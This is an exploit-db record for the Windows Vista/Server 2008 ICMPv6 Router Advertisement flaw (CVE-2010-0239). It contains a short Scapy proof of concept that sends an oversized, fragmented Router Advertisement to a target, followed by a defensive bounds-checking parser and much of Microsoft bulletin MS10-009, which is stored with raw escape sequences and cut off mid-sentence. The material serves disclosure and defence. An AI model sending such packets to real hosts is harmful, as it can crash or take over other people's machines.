Microsoft Windows VISTA/2008 ICMPv6 Router Advertisement Remote Code Execution Vulnerability
Published: 2010-02-09
ID: EDB-ID:33594 | Type: exploitdb | Reporter: Sumit Gwalani | Modified: 2010-02-09
Description
Microsoft Windows VISTA/2008 ICMPv6 Router Advertisement Remote Code Execution Vulnerability. CVE-2010-0239. Remote exploit for windows platform
source: http://www.securityfocus.com/bid/38061/info
Microsoft Windows TCP/IP protocol implementation is prone to a remote code-execution vulnerability.
An attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful attacks will completely compromise affected computers. Failed exploit attempts will likely result in denial-of-service conditions.
from scapy.all import *   # IPv6, IPv6ExtHdrFragment, ICMPv6ND_RA, ICMPv6NDOptPrefixInfo, fragment6, sendp

v6_dst = "<IPv6 address>"   # target address on the local link
mac_dst = "<Mac address>"   # target MAC; ND messages are delivered on-link, so the frame is addressed directly
# Router Advertisement whose Prefix Information option claims Length=255 (255 * 8 = 2040 bytes) although
# the option's fixed size is 32 bytes; the 2008 bytes of 'A' make the on-wire size match the claim.
# hlim=255 is mandatory for ND messages (RFC 4861); the Fragment header lets fragment6() split the packet at the MTU.
pkt = IPv6(dst=v6_dst, hlim=255) / IPv6ExtHdrFragment() / ICMPv6ND_RA() / ICMPv6NDOptPrefixInfo(len=255, prefixlen=64, prefix="2001::") / Raw(load='A'*2008)
l = fragment6(pkt, 1500)
for p in l:
    sendp(Ether(dst=mac_dst)/p, iface="eth0")
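The PoC above only shows the attacker's side. The following is an added example, not part of the exploit-db entry or of the MS10-009 bulletin, that rebuilds the shape of that packet in raw bytes (no Scapy needed; checksum left at zero, inputs constructed inline) and runs the Router Advertisement option list through the bounds checks a receiver has to apply: the declared option Length must be non-zero, must fit in the bytes actually present, and for fixed-format options must equal the value the RFC mandates (Prefix Information, RFC 4861, is always 4 units; Route Information, RFC 4191, is 1, 2 or 3 units and must be long enough for its prefix length). It goes a step beyond the PoC by also covering the Route Information option that the bulletin lists separately as CVE-2010-0241. Field layouts follow the RFCs; the helper and constant names are this example's own.

```python
"""Bounds-checking parser for ICMPv6 Router Advertisement options (added example)."""
import struct

ICMPV6_ROUTER_ADVERTISEMENT = 134
RA_HEADER_LEN = 16              # type, code, checksum, cur hop limit, flags, router lifetime, 2 x 32-bit timers
OPT_PREFIX_INFORMATION = 3      # RFC 4861 4.6.2: Length is always 4 (32 octets)
OPT_ROUTE_INFORMATION = 24      # RFC 4191 2.3: Length is 1, 2 or 3 depending on Prefix Length


class MalformedRA(ValueError):
    """Raised for any option whose Length field is inconsistent with the buffer or the RFCs."""


def build_ra(options: bytes) -> bytes:
    """RA header followed by options. Checksum stays 0: constructed test input, not a wire-valid packet."""
    hdr = struct.pack("!BBHBBHII", ICMPV6_ROUTER_ADVERTISEMENT, 0, 0, 64, 0, 1800, 0, 0)
    return hdr + options


def build_prefix_info(length_units: int, prefixlen: int, prefix: bytes, trailer: bytes = b"") -> bytes:
    """Prefix Information option. length_units is the attacker-controlled Length field;
    trailer plays the role of the PoC's Raw(load='A'*2008)."""
    assert len(prefix) == 16
    fixed = struct.pack("!BBBBIII", OPT_PREFIX_INFORMATION, length_units, prefixlen, 0xC0,
                        2592000, 604800, 0)          # L+A flags, valid/preferred lifetimes, reserved
    return fixed + prefix + trailer


def build_route_info(length_units: int, prefixlen: int, prefix: bytes) -> bytes:
    """Route Information option: type, length, prefix length, preference flags, route lifetime,
    then 0, 8 or 16 octets of prefix for Length 1, 2 or 3."""
    fixed = struct.pack("!BBBBI", OPT_ROUTE_INFORMATION, length_units, prefixlen, 0x00, 3600)
    return fixed + prefix


def check_option_length(opt_type: int, length_units: int, remaining: int) -> None:
    """The checks that must run before an option body is touched. The last two reject the PoC
    shape even though its 2040 declared bytes really are on the wire."""
    if length_units == 0:
        raise MalformedRA("option Length 0 (RFC 4861 4.6)")
    size = length_units * 8
    if size > remaining:
        raise MalformedRA(f"option type {opt_type} declares {size} bytes, {remaining} remain")
    if opt_type == OPT_PREFIX_INFORMATION and length_units != 4:
        raise MalformedRA(f"Prefix Information Length {length_units}, must be 4")
    if opt_type == OPT_ROUTE_INFORMATION and length_units not in (1, 2, 3):
        raise MalformedRA(f"Route Information Length {length_units}, must be 1, 2 or 3")


def parse_ra_options(ra: bytes):
    """Walk the option TLVs after the RA header and return [(type, length_units, body)]."""
    if len(ra) < RA_HEADER_LEN or ra[0] != ICMPV6_ROUTER_ADVERTISEMENT:
        raise MalformedRA("not a Router Advertisement")
    offset, options = RA_HEADER_LEN, []
    while offset < len(ra):
        if len(ra) - offset < 2:
            raise MalformedRA("truncated option header")
        opt_type, length_units = ra[offset], ra[offset + 1]
        check_option_length(opt_type, length_units, len(ra) - offset)
        if opt_type == OPT_ROUTE_INFORMATION:
            prefixlen = ra[offset + 2]
            needed = 3 if prefixlen > 64 else 2 if prefixlen > 0 else 1   # RFC 4191 2.3
            if length_units < needed:
                raise MalformedRA(f"Route Information Length {length_units} too short for /{prefixlen}")
        size = length_units * 8
        options.append((opt_type, length_units, ra[offset + 2:offset + size]))
        offset += size
    return options


def classify(ra: bytes) -> str:
    """Accept/reject verdict, as a hardened receiver or an IDS check would report it."""
    try:
        return f"accept: {len(parse_ra_options(ra))} option(s)"
    except MalformedRA as exc:
        return f"reject: {exc}"


PREFIX_2001 = bytes.fromhex("2001" + "0" * 28)            # 2001::/64, the prefix used by the PoC
BENIGN_RA = build_ra(build_prefix_info(4, 64, PREFIX_2001) + build_route_info(2, 48, PREFIX_2001[:8]))
# Same shape as the PoC: Length 255 (2040 bytes) backed by 32 + 2008 bytes actually present.
POC_SHAPED_RA = build_ra(build_prefix_info(255, 64, PREFIX_2001, b"A" * 2008))
# Length claims more than is on the wire: the plain out-of-bounds read case.
TRUNCATED_RA = build_ra(build_prefix_info(255, 64, PREFIX_2001))
# CVE-2010-0241 shape: Route Information option with an out-of-range Length (48 bytes present).
BAD_ROUTE_INFO_RA = build_ra(build_route_info(6, 48, b"\x20\x01\x0d\xb8" + b"\x00" * 36))

if __name__ == "__main__":
    for name, pkt in [("benign", BENIGN_RA), ("poc-shaped", POC_SHAPED_RA),
                      ("truncated", TRUNCATED_RA), ("bad-route-info", BAD_ROUTE_INFO_RA)]:
        print(f"{name:15s} {len(pkt):5d} bytes  {classify(pkt)}")
```

Two things about the PoC follow from this. The Fragment header and fragment6() are there only because a 2040-byte option cannot fit a 1500-byte link MTU; RFC 6980 (2013) later required hosts to drop Neighbor Discovery messages that arrive with a Fragment header, so on stacks that implement it this delivery path is closed independently of the MS10-009 fix. And the check that actually stops the PoC shape is the fixed-Length rule, not the buffer-bounds rule, because the attacker padded the packet until the claim was true.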
Record metadata (exploit-db / vulners)
EDB-ID: 33594 (https://www.exploit-db.com/exploits/33594/; source download: https://www.exploit-db.com/download/33594/)
Published: 2010-02-09; modified: 2010-02-09; reporter: Sumit Gwalani
CVE: CVE-2010-0239; OSVDB: 62250
CVSS v2: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C); vulners score 8.6
Related entries: CVE-2010-0239; SSV:19152 (seebug); SECURITYVULNS:DOC:23198, SECURITYVULNS:VULN:10601; OPENVAS:801479, OPENVAS:1361412562310801479; Nessus plugins SMB_NT_MS10-009.NASL, WIN_SERVER_2008_NTLM_PCI.NASL; THREATPOST:F9D20D7B330A431D721F16F5223B236A
Related entry: CVE-2010-0239 (NVD)
Published 2010-02-10, last modified 2018-10-12. CVSS v2 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C).
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0239

The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2, when IPv6 is enabled, does not properly perform bounds checking on ICMPv6 Router Advertisement packets, which allows remote attackers to execute arbitrary code via crafted packets, aka "ICMPv6 Router Advertisement Vulnerability."

Related entry: SSV:19152 (seebug), Microsoft Windows ICMPv6 Router Advertisement Buffer Overflow Vulnerability (MS10-009)
Published 2010-02-20. CVSS v2 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C). https://www.seebug.org/vuldb/ssvid-19152

BUGTRAQ ID: 38061
CVE ID: CVE-2010-0239

Microsoft Windows is a very widely used operating system published by Microsoft.

The Windows TCP/IP stack does not perform sufficient bounds checking when processing specially crafted ICMPv6 Router Advertisement packets. An anonymous attacker can exploit this vulnerability by sending crafted ICMPv6 packets to a computer with IPv6 enabled; an attacker who succeeds can take complete control of the affected system.

Affected:
Microsoft Windows Vista SP2
Microsoft Windows Vista SP1
Microsoft Windows Vista
Microsoft Windows Server 2008 SP2
Microsoft Windows Server 2008

Temporary workaround:

* Disable the "Core Networking – Router Advertisement (ICMPv6-In)" inbound firewall rule. From an elevated command prompt, run:

netsh advfirewall firewall set rule name="Core Networking – Router Advertisement (ICMPv6-In)" dir=in new enable=No

Vendor patch:

Microsoft
---------
Microsoft has released security bulletin MS10-009 and the corresponding patch:
MS10-009: Vulnerabilities in Windows TCP/IP Could Allow Remote Code Execution (974145)
Link: http://www.microsoft.com/technet/security/Bulletin/MS10-009.mspx?pf=true

Related entry (securityvulns): Microsoft Security Bulletin MS10-009 - Critical
Vulnerabilities in Windows TCP/IP Could Allow Remote Code Execution (974145)
Published: February 09, 2010
Version: 1.0

General Information

Executive Summary

This security update resolves four privately reported vulnerabilities in Microsoft Windows. The most severe of these vulnerabilities could allow remote code execution if specially crafted packets are sent to a computer with IPv6 enabled. An attacker could try to exploit the vulnerability by creating specially crafted ICMPv6 packets and sending the packets to a system with IPv6 enabled. This vulnerability may only be exploited if the attacker is on-link.

This security update is rated Critical for Windows Vista and Windows Server 2008.
For more information, see the subsection, Affected and Non-Affected Software, in this section.

The security update addresses the vulnerabilities by changing the way Windows TCP/IP performs bounds checking and other packet handling operations. For more information about the vulnerabilities, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.

Recommendation. The majority of customers have automatic updating enabled and will not need to take any action because this security update will be downloaded and installed automatically. Customers who have not enabled automatic updating need to check for updates and install this update manually. For information about specific configuration options in automatic updating, see Microsoft Knowledge Base Article 294871.

For administrators and enterprise installations, or end users who want to install this security update manually, Microsoft recommends that customers apply the update immediately using update management software, or by checking for updates using the Microsoft Update service.

See also the section, Detection and Deployment Tools and Guidance, later in this bulletin.

Known Issues. None

Affected and Non-Affected Software

The following software has been tested to determine which versions or editions are affected. Other versions or editions are either past their support life cycle or are not affected. To determine the support life cycle for your software version or edition, visit Microsoft Support Lifecycle.

Affected Software

Operating System | Maximum Security Impact | Aggregate Severity Rating | Bulletins Replaced by this Update
Windows Vista, Windows Vista Service Pack 1, and Windows Vista Service Pack 2 | Remote Code Execution | Critical | None
Windows Vista x64 Edition, Windows Vista x64 Edition Service Pack 1, and Windows Vista x64 Edition Service Pack 2 | Remote Code Execution | Critical | None
Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2* | Remote Code Execution | Critical | None
Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2* | Remote Code Execution | Critical | None
Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2 | Remote Code Execution | Critical | None

*Server Core installation affected. This update applies, with the same severity rating, to supported editions of Windows Server 2008, whether or not installed using the Server Core installation option. For more information on this installation option, see the MSDN article, Server Core. Note that the Server Core installation option does not apply to certain editions of Windows Server 2008; see Compare Server Core Installation Options.

Non-Affected Software

Operating System
Microsoft Windows 2000 Service Pack 4
Windows XP Service Pack 2 and Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 with SP2 for Itanium-based Systems
Windows 7 for 32-bit Systems
Windows 7 for x64-based Systems
Windows Server 2008 R2 for x64-based Systems
Windows Server 2008 R2 for Itanium-based Systems

Frequently Asked Questions (FAQ) Related to This Security Update

Where are the file information details?
Refer to the reference tables in the Security Update Deployment section for the location of the file information details.

Why does this update address several reported security vulnerabilities?
This update contains support for several vulnerabilities because the modifications that are required to address these issues are located in related files. Instead of having to install several updates that are almost the same, customers need to install this update only.

I am using an older release of the software discussed in this security bulletin. What should I do?
The affected software listed in this bulletin has been tested to determine which releases are affected. Other releases are past their support life cycle. For more information about the product lifecycle, visit the Microsoft Support Lifecycle Web site.

It should be a priority for customers who have older releases of the software to migrate to supported releases to prevent potential exposure to vulnerabilities. To determine the support lifecycle for your software release, see Select a Product for Lifecycle Information.
For more information about service packs for these software releases, see Lifecycle Supported Service Packs.

Customers who require custom support for older software must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the Microsoft Worldwide Information Web site, select the country in the Contact Information list, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. For more information, see the Microsoft Support Lifecycle Policy FAQ.

Vulnerability Information

Severity Ratings and Vulnerability Identifiers

The following severity ratings assume the potential maximum impact of the vulnerability. For information regarding the likelihood, within 30 days of this security bulletin's release, of the exploitability of the vulnerability in relation to its severity rating and security impact, please see the Exploitability Index in the February bulletin summary. For more information, see Microsoft Exploitability Index.

Vulnerability Severity Rating and Maximum Security Impact by Affected Software

Affected Software | ICMPv6 Router Advertisement Vulnerability - CVE-2010-0239 | Header MDL Fragmentation Vulnerability - CVE-2010-0240 | ICMPv6 Route Information Vulnerability - CVE-2010-0241 | TCP/IP Selective Acknowledgement Vulnerability - CVE-2010-0242 | Aggregate Severity Rating
Windows Vista, Windows Vista Service Pack 1, and Windows Vista Service Pack 2 | Critical (Remote Code Execution) | Important (Remote Code Execution) | Critical (Remote Code Execution) | Important (Denial of Service) | Critical
Windows Vista x64 Edition, Windows Vista x64 Edition Service Pack 1, and Windows Vista x64 Edition Service Pack 2 | Critical (Remote Code Execution) | Important (Remote Code Execution) | Critical (Remote Code Execution) | Important (Denial of Service) | Critical
Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2* | Critical (Remote Code Execution) | Important (Remote Code Execution) | Critical (Remote Code Execution) | Important (Denial of Service) | Critical
Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2* | Critical (Remote Code Execution) | Important (Remote Code Execution) | Critical (Remote Code Execution) | Important (Denial of Service) | Critical
Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2 | Critical (Remote Code Execution) | Important (Remote Code Execution) | Critical (Remote Code Execution) | Important (Denial of Service) | Critical

*Server Core installation affected. This update applies, with the same severity rating, to supported editions of Windows Server 2008, whether or not installed using the Server Core installation option. For more information on this installation option, see the MSDN article, Server Core. Note that the Server Core installation option does not apply to certain editions of Windows Server 2008; see Compare Server Core Installation Options.

ICMPv6 Router Advertisement Vulnerability - CVE-2010-0239

A remote code execution vulnerability exists in the Windows TCP/IP stack due to insufficient bounds checking when processing specially crafted ICMPv6 Router Advertisement packets. An anonymous attacker could exploit the vulnerability by sending specially crafted ICMPv6 Router Advertisement packets to a computer with IPv6 enabled. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

To view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-0239.

Mitigating Factors for ICMPv6 Router Advertisement Vulnerability - CVE-2010-0239

Microsoft has not identified any mitigating factors for this vulnerability.

Workarounds for ICMPv6 Router Advertisement Vulnerability - CVE-2010-0239

Workaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update.
Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:

• Disable the "Core Networking – Router Advertisement (ICMPv6-In)" inbound firewall rule

To disable this firewall rule, run the following command from an elevated command prompt:

netsh advfirewall firewall set rule name="Core Networking – Router Advertisement (ICMPv6-In)" dir=in new enable=No

Impact of workaround. ICMPv6 router advertisements will be blocked. This could adversely impact IPv6 functionality in common deployment scenarios, where the router discovery protocol is used for host configuration.

How to undo the workaround.

To re-enable this firewall rule, run the following command from an elevated command prompt:

netsh advfirewall firewall set rule name="Core Networking – Router Advertisement (ICMPv6-In)" dir=in new enable=Yes

FAQ for ICMPv6 Router Advertisement Vulnerability - CVE-2010-0239

What is the scope of the vulnerability?
This is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated privileges on vulnerable systems. An attacker could then install programs or view, change, or delete data; or create new accounts with full user rights.

What causes the vulnerability?
The vulnerability is caused by the Windows TCP/IP stack not performing the appropriate level of bounds checking on specially crafted ICMPv6 Router Advertisement packets.

What is TCP/IP?
TCP/IP is a set of networking protocols that are widely used on the Internet. TCP/IP provides communications across interconnected networks of computers that have diverse hardware architectures and that run various operating systems. TCP/IP includes standards for how computers communicate and conventions for connecting networks and for routing traffic. For more information about TCP/IP, see the TechNet article, Overview of networking and TCP/IP.

What is IPv6?
Internet Protocol version 6 (IPv6), a new suite of standard protocols for the network layer of the Internet, is built into Microsoft Windows XP and later. IPv6 is designed to solve many of the problems of the current version of IP (known as IPv4) such as address depletion, security, autoconfiguration, and extensibility. To learn more about IPv6, please see the TechNet site, FAQ for IPv6.

What are Router Advertisements?
Router Advertisements allow routers to instruct hosts how to perform Address Autoconfiguration. For example, routers can specify whether hosts should use DHCPv6 and/or autonomous (stateless) address configuration. Routers advertise their presence together with various link and Internet parameters either periodically, or in response to a Router Solicitation message. Router Advertisements contain prefixes that are used for determining whether another address shares the same link (on-link determination) and/or address configuration, a suggested hop limit value, etc. For more information about Router Advertisements and Neighbor Discovery in IPv6, see RFC 4861.

What might an attacker use the vulnerability to do?
An attacker who successfully exploited this vulnerability could run arbitrary code. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

How could an attacker exploit the vulnerability?
An attacker could try to exploit the vulnerability by creating specially crafted ICMPv6 packets and sending the packets to a system with IPv6 enabled. This vulnerability may only be exploited if the attacker is on-link. Tunneling protocols, such as ISATAP, may effectively allow attackers to deliver the corrupted packet to the target machine even if the attacker is not present on the same physical link.

When is an attacker considered "on-link"?
For purposes of this vulnerability, an attacker is considered on-link if they are on the same physical or virtual link and are able to send a valid neighbor discovery message to the target host. An example of a virtual link is one that occurs via an ISATAP tunnel. For more information about on-link addresses and Neighbor Discovery in IPv6, see RFC 4861.

What systems are primarily at risk from the vulnerability?
All operating systems with the IPv6 features enabled are at risk from this vulnerability. By default all the supported features for IPv6 are enabled in Windows Vista and Windows Server 2008.

What does the update do?
The update addresses this vulnerability by changing the manner in which the Windows TCP/IP stack performs bounds checking on specially crafted ICMPv6 Router Advertisement packets.

When this security bulletin was issued, had this vulnerability been publicly disclosed?
No. Microsoft received information about this vulnerability through responsible disclosure.

When this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?
No. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.

Header MDL Fragmentation Vulnerability - CVE-2010-0240

A remote code execution vulnerability exists in the Windows TCP/IP stack due to the manner in which the TCP/IP stack handles specially crafted Encapsulating Security Payloads (ESP) over UDP datagram fragments when running a custom network driver. An attacker who successfully exploited this vulnerability could take complete control of an affected system.
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

To view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-0240.

Mitigating Factors for Header MDL Fragmentation Vulnerability - CVE-2010-0240

Mitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:

• This vulnerability only impacts Windows systems if they have installed a custom network driver that splits the UDP header into multiple MDLs. Microsoft is not aware of any driver that takes this action.

Workarounds for Header MDL Fragmentation Vulnerability - CVE-2010-0240

Workaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:

• Enable advanced TCP/IP filtering on systems that support this feature

To help protect from network-based attempts to exploit this vulnerability, enable advanced TCP/IP filtering on systems that support this feature. You can enable advanced TCP/IP filtering to block all unsolicited inbound traffic. For more information about how to configure TCP/IP filtering, see Microsoft Knowledge Base Article 309798.

FAQ for Header MDL Fragmentation Vulnerability - CVE-2010-0240

What is the scope of the vulnerability?
This is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated privileges on vulnerable systems. An attacker could then install programs or view, change, or delete data; or create new accounts with full user rights.

What causes the vulnerability?
The vulnerability is caused by the Windows TCP/IP stack not handling specially crafted IP datagram fragments when running a custom network driver.

What is TCP/IP?
TCP/IP is a set of networking protocols that are widely used on the Internet. TCP/IP provides communications across interconnected networks of computers that have diverse hardware architectures and that run various operating systems. TCP/IP includes standards for how computers communicate and conventions for connecting networks and for routing traffic. For more information about TCP/IP, see the TechNet article, Overview of networking and TCP/IP.

What is an Encapsulating Security Payload (ESP)?
Encapsulating Security Payload (ESP) provides confidentiality (in addition to authentication, integrity, and anti-replay protection) for the IP payload. ESP in transport mode does not sign the entire packet. Only the IP payload (not the IP header) is protected. ESP can be used alone or in combination with Authentication Header (AH).

What is a Memory Descriptor List (MDL)?
A memory descriptor list (MDL) is a system-defined structure that describes a buffer by a set of physical addresses. A driver that performs direct I/O receives a pointer to an MDL from the I/O manager, and reads and writes data through the MDL. Some drivers also use MDLs when they perform direct I/O to satisfy a device I/O control request. For more information about MDLs, see the Windows Hardware Developer Central article, What is really in that MDL?

Does this attack require the UDP traffic to be fragmented?
No. This attack does not rely on fragmented network traffic. Instead, the fragmentation involved requires the network driver on the target system to fragment the UDP header into separate MDLs.

What might an attacker use the vulnerability to do?
An attacker who successfully exploited this vulnerability could run arbitrary code. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

How could an attacker exploit the vulnerability?
An attacker could try to exploit the vulnerability by creating specially crafted IP datagram fragments and sending the packets to a system with a custom network driver installed.

What systems are primarily at risk from the vulnerability?
All affected operating systems may be at risk from this vulnerability if they have installed a custom network driver that splits the UDP header into multiple MDLs. No network drivers that ship with Windows can take this action. Microsoft is not aware of any network driver that can take this action.

What does the update do?
The update addresses this vulnerability by changing the manner in which the Windows TCP/IP stack handles specially crafted ESP over UDP datagrams.

When this security bulletin was issued, had this vulnerability been publicly disclosed?
No. Microsoft received information about this vulnerability through responsible disclosure.

When this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?
No. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.

ICMPv6 Route Information Vulnerability - CVE-2010-0241

A remote code execution vulnerability exists in the Windows TCP/IP stack due to insufficient bounds checking when processing specially crafted ICMPv6 Route Information packets.
An anonymous attacker could exploit the vulnerability by sending specially crafted ICMPv6 Route Information packets to a computer with IPv6 enabled. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-0241.\r\n\t\r\nMitigating Factors for ICMPv6 Route Information Vulnerability - CVE-2010-0241\r\n\r\nMicrosoft has not identified any mitigating factors for this vulnerability.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for ICMPv6 Route Information Vulnerability - CVE-2010-0241\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nDisable the "Core Networking \u2013 Router Advertisement (ICMPv6-In)" inbound firewall rule\r\n\r\nTo disable this firewall rule, run the following command from an elevated command prompt:\r\n\r\nnetsh firewall set rule name="Core Networking \u2013 Router Advertisement (ICMPv6-In)" dir=in new enable=No\r\n\r\nImpact of workaround. ICMPv6 router advertisements will be blocked. 
This could adversely impact IPv6 functionality in common deployment scenarios, where router discovery protocol is used for host configuration.\r\n\r\nHow to undo the workaround.\r\n\r\nTo re-enable this firewall rule, run the following command from an elevated command prompt:\r\n\r\nnetsh firewall set rule name="Core Networking \u2013 Router Advertisement (ICMPv6-In)" dir=in new enable=Yes\r\n\r\nTop of sectionTop of section\r\n\t\r\nFAQ for ICMPv6 Route Information Vulnerability - CVE-2010-0241\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated privileges on vulnerable systems. An attacker could then install programs or view, change, or delete data; or create new accounts with full user rights.\r\n\r\nWhat causes the vulnerability? \r\nThe vulnerability is caused by the Windows TCP/IP stack not performing the appropriate level of bounds checking on specially crafted ICMPv6 Route Information packets.\r\n\r\nWhat is TCP/IP? \r\nTCP/IP is a set of networking protocols that are widely used on the Internet. TCP/IP provides communications across interconnected networks of computers that have diverse hardware architectures and that run various operating systems. TCP/IP includes standards for how computers communicate and conventions for connecting networks and for routing traffic. For more information about TCP/IP, see the TechNet article, Overview of networking and TCP/IP.\r\n\r\nWhat is IPv6? \r\nInternet Protocol version 6 (IPv6), a new suite of standard protocols for the network layer of the Internet, is built into Microsoft Windows XP and later. IPv6 is designed to solve many of the problems of the current version of IP (known as IPv4) such as address depletion, security, auto-configuration, and extensibility. To learn more about IPv6, please see the TechNet site, FAQ for IPv6.\r\n\r\nWhat are Router Advertisements? 
\r\nRouter Advertisements allow routers to instruct hosts how to perform Address Autoconfiguration. For example, routers can specify whether hosts should use DHCPv6 and/or autonomous (stateless) address configuration. Routers advertise their presence together with various link and Internet parameters either periodically, or in response to a Router Solicitation message. Router Advertisements contain prefixes that are used for determining whether another address shares the same link (on-link determination) and/or address configuration, a suggested hop limit value, etc. For more information about Router Advertisements and Neighbor Discovery in IPv6, see RFC 4861.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could run arbitrary code. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker could try to exploit the vulnerability by creating specially crafted ICMPv6 packets and sending the packets to a system with IPv6 enabled. This vulnerability may only be exploited if the attacker is on-link. Tunneling protocols, such as ISATAP, may effectively allow attackers to deliver the corrupted packet to the target machine even if the attacker is not present on the same physical link.\r\n\r\nWhen is an attacker considered "on-link"? \r\nFor purposes of this vulnerability, an attacker is considered on-link if they are on the same physical or virtual link and are able to send a valid neighbor discovery message to the target host. An example of a virtual link is one that occurs via an ISATAP tunnel. For more information about on-link addresses and Neighbor Discovery in IPv6, see RFC 4861.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nAll operating systems with the IPv6 features enabled are at risk from this vulnerability. 
By default all the supported features for IPv6 are enabled in Windows Vista and Windows Server 2008.\r\n\r\nWhat does the update do? \r\nThe update addresses this vulnerability by changing the manner in which the Windows TCP/IP stack performs bounds checking on specially crafted ICMPv6 Route Information packets.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through responsible disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\n\t\r\nTCP/IP Selective Acknowledgement Vulnerability - CVE-2010-0242\r\n\r\nA denial of service vulnerability exists in TCP/IP processing in Microsoft Windows due to an error in the processing of specially crafted TCP packets with a malformed selective acknowledgment (SACK) value. 
An attacker could exploit the vulnerability by sending the target system a small number of specially crafted packets causing the affected system to stop responding and automatically restart.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-0242.\r\n\t\r\nMitigating Factors for TCP/IP Selective Acknowledgement Vulnerability - CVE-2010-0242\r\n\r\nMicrosoft has not identified any mitigating factors for this vulnerability.\r\n\t\r\nWorkarounds for TCP/IP Selective Acknowledgement Vulnerability - CVE-2010-0242\r\n\r\nMicrosoft has not identified any workarounds for this vulnerability.\r\n\t\r\nFAQ for TCP/IP Selective Acknowledgement Vulnerability - CVE-2010-0242\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a denial of service vulnerability. An attacker who exploited this vulnerability could cause the affected system to stop responding. Note that the denial of service vulnerability would not allow an attacker to execute code or to elevate their user rights, but it could cause the affected system to stop accepting requests.\r\n\r\nWhat causes the vulnerability? \r\nThe vulnerability is caused by the Windows TCP/IP stack not properly handling malformed TCP SACK values.\r\n\r\nWhat is TCP/IP? \r\nTCP/IP is a set of networking protocols that are widely used on the Internet. TCP/IP provides communications across interconnected networks of computers that have diverse hardware architectures and that run various operating systems. TCP/IP includes standards for how computers communicate and conventions for connecting networks and for routing traffic. For more information about TCP/IP, see the TechNet article, Overview of networking and TCP/IP.\r\n\r\nWhat is TCP/IP Selective Acknowledgement (SACK)? \r\nSelective acknowledgment (SACK) is used for connections with large TCP window sizes. 
When SACK is enabled, if a packet or series of packets is dropped the receiver can inform the sender of exactly which data has been received and where the holes in the data are. The sender can then selectively retransmit the missing data without needing to retransmit blocks of data that have already been received successfully. Prior to SACK, which was added to the Windows TCP/IP stack in Microsoft Windows 2000, a receiver could only acknowledge the latest sequence number of contiguous data that had been received, or the left edge of the receive window. For more information about SACK, see the MSDN article, Windows TCP Implementation Features.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could cause an affected system to become non-responsive.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker could exploit the vulnerability by sending a system a small number of specially crafted TCP packets with a malformed selective acknowledgment (SACK) value.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nAll affected operating systems are at risk from this vulnerability.\r\n\r\nWhat does the update do? \r\nThe update addresses this vulnerability by correcting the manner in which the Windows TCP/IP stack handles malformed 